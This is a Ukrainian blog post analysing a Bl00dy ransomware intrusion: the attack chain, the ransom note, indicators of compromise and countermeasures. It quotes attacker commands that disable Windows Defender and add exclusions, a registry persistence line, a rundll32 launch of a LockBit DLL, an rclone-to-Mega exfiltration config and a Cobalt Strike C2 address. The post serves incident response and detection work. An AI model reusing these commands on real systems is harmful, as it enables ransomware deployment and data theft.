.bl00dy ransomware [UA]
(!) English version of this content can be found here
Initial Access: N/A
Persistence: CobaltStrike, LOLbins
Credentials: LSASS Dump/PrivEscalation
Lateral: SMB, RDP
Exfil: rclone to mega
C2: CobaltStrike
Сьогодні (25.09.22) на аналіз було отримано вельми обмежену інформацію від однієї із українських жертв Bl00dy Ransomware Gang. На жаль, з наданих файлів не можливо встановити вектор втручання, часові рамки атаки та які операції були автоматизовані, а які проводилися в інтерактиві, проте інформації виявилося цілком достатньо для реконструкції схеми атаки.
https://twitter.com/tdatwja/status/1573776328486113281
Прошу ознайомитися і вжити відповідних заходів.
Коротка довідка:
Bl00dy ransomware gang – одне із угрупувань, що використовує тактику double extortion (крадуть і шифрують інформацію). Замість сайту з “стіною сорому” використовують Телеграм канал, де продають та/або публікують дані, якщо жертва відмовилась сплачувати викуп. Активна діяльність групи відстежується з липня поточного року. Детальніше (databreaches.net)
Вхідні дані:
Звернення жертви після виявлення факту спотворення файлів на одній із систем:
Реконструкція схеми атаки:
Виходячи з ransom note атрибуція нападників достатньо очевидна:
GREETINGS FROM BL00DY RANSOMWARE GANG
We download your company important files / documents / databases/ mails / accounts
We publish it to the public if you dont cooperate .
filedecryptionsupport@msgsafe.io
Telegram hall of shame , where all company private data will be PUBLISHED??
https://t.me/bl00dy_Ransomware_Gang
…
Але в той же час ID Ransomware пов’язує контактний email із Conti:
Враховуючи цікаву історію розпаду Conti та їх гучну операцію в Коста-Ріці, можна припустити, що таємниче угрупування #Bl00dy Ransomware Gang є одним із побічних проектів Conti, але перевіреної інформації, щоб підтвердити це поки немає.
update 26/09/22
З іншого боку, як влучно згадали @malwrhunterteam- раніше це угрупування використовувало Babuk, потім злитий Conti а тепер злитий LockBit
Тепер перейдемо до встановлення ролей кожного із наданих зразків:
logs.bat [c:\windows\temp\] – запуск шифрування через DLL
:rundll32 C:\LB3_ReflectiveDll_DllMain-cyt.dll,gdll
reg.txt – постановка задачі на активацію скрипта logs.bat до входу в систему
reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce” /v notepad /t REG_SZ /d “c:\windows\temp\logs.bat”
wddd4.bat [c:\] – деактивація та видалення Windows Defender
powershell -command “Add-MpPreference -ExclusionPath ‘C:\Windows\temp'”
powershell -command “Add-MpPreference -ExclusionExtension “.exe””
powershell -command “Add-MpPreference -ExclusionPath ‘C:\'”
powershell -command “Add-MpPreference -ExclusionExtension “.dll””
Uninstall-WindowsFeature -Name Windows-Defender
reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender” /v DisableAntiVirus /t REG_DWORD /d 1 /f
…
pause
rclone.conf – конфігураційний файл rclone (інструмент передачі файлів)
[remote]
type = mega
user = filedecryptionsupport@msgsafe.io
pass = ********************************
veeamsvr.exe [?] – rclone замаскований під службу veeam
wget.exe [?] – версія інструменту wget під ОС Windows
wmware-1.log [c:\windows\temp\] – Cobalt Strike Beacon (payload)
C2: 185.170.42{.} 93:80/g.pixel
LB3_ReflectiveDll_DllMain-cyt.dll [c:\] – тіло ransomware захищене WinLicense
Статичний аналіз DLL ідентифікує LockBit 3.0 builder, який було злито в мережу буквально на минулому тижні.
Що одразу кидається в очі? Використання c:\windows\temp\ замість профілю користувача та виклик файлів з кореню диску С: – звичайний користувач туди писати/звертатись не може. Це означає, що або було підняття прав через сам Cobalt Strike, або ж втручання було здійснено через проміжний хост, з якого отримали хеш паролю адміністратора (дамп LSASS/Mimikatz).
Якщо розставити скрипти та інструментарій нападників у логічній послідовності, то отримаємо такий стан системи перед початком шифрування:
- отримано віддалений контроль через запуск Cobalt Strike
- для доставки необхідних інструментів скористались wget
- крадіжка (upload) даних був здійснений через rclone на обліковий запис сервісу mega
- Windows Defender було деактивовано скриптом
- запуск шифрування був замаскований під обробку DLL, яка була ініційована вбудованим інструментом ОС reg через RunServicesOnce
Після завершення шифрування – файли спотворені, інформація викрадена, жертву очікує сплата викупу або ж оприлюднення вкраденого у каналі Телеграм.
У підсумку отримуємо наступний порядок активації скриптів та засобів наступний:
Контрзаходи:
- Сувора фільтрація Web та Email на предмет нетипового та/або потенційно шкідливих файлів (макроси, скрипти і т.ін.)
- Спеціальні політики (GPO/EPP) на заборону запуску вбудованих засобів ОС Windows (LOLBin)
- Використання NGFW/IPS для блокування трафіку Cobalt Strike
- Виявлення та блокування команд rclone
- Блокування доступу до популярних файлових сховищ (на рівні NGFW/Web Proxy), які не регламентовані для використання в організації (Mega, onedrive, fex etc)
- Використання технологій типу Host IPS / Exploit Prevention для виявлення способів запуску/підгрузки сторонніх DLL
- Контроль внесення змін до реєстру (заборона зміни стану автозапуску)
- Використання РАМ для контролю за використанням облікових записів
Практичні поради:
Звіт справді не повний позаяк я мав справу лише з частиною артефактів і не мав можливості бачити журнали скомпрометованої ОС. Але ви повинні розуміти, що TTPs угрупувань на 90% автоматизовані, тому для перевірки політик ваших систем захисту нагадую базові речі:
- Cobalt Strike, a Defender’s Guide part 1, part 2
- Rclone detection [redcanary]
- SANS Ransomware Summit 2022, Can You Detect This?
- Trellix Insights: Daily C2: CobaltStrike [KB94406]
- Мистецтво захисту барʼєрів
Сподіваюсь ця інформація буде для вас вчасною та корисною.
Будьте здорові, уважні та обережні.
Вірте в ЗСУ.
Слава Україні.
#OptiData #InformationSecurity #Security
#Інформаційнабезпека #безпека #IOC #malware
#ransomware #bl00dy #cobaltstrike #rclone #DLL
VR
21 responses to “.bl00dy ransomware [UA]”
Trackbacks / Pingbacks
- 28/09/2022 -
- 28/09/2022 -
- 28/09/2022 -
- 28/09/2022 -
- 28/09/2022 -
- 28/09/2022 -
- 28/09/2022 -
- 28/09/2022 -
- 28/09/2022 -
- 29/09/2022 -
- 29/09/2022 -
- 01/10/2022 -
- 01/10/2022 -
- 02/10/2022 -
- 02/10/2022 -
- 02/10/2022 -
- 02/10/2022 -
- 04/10/2022 -
- 05/02/2023 -
- 06/02/2023 -
English version of report available
LikeLike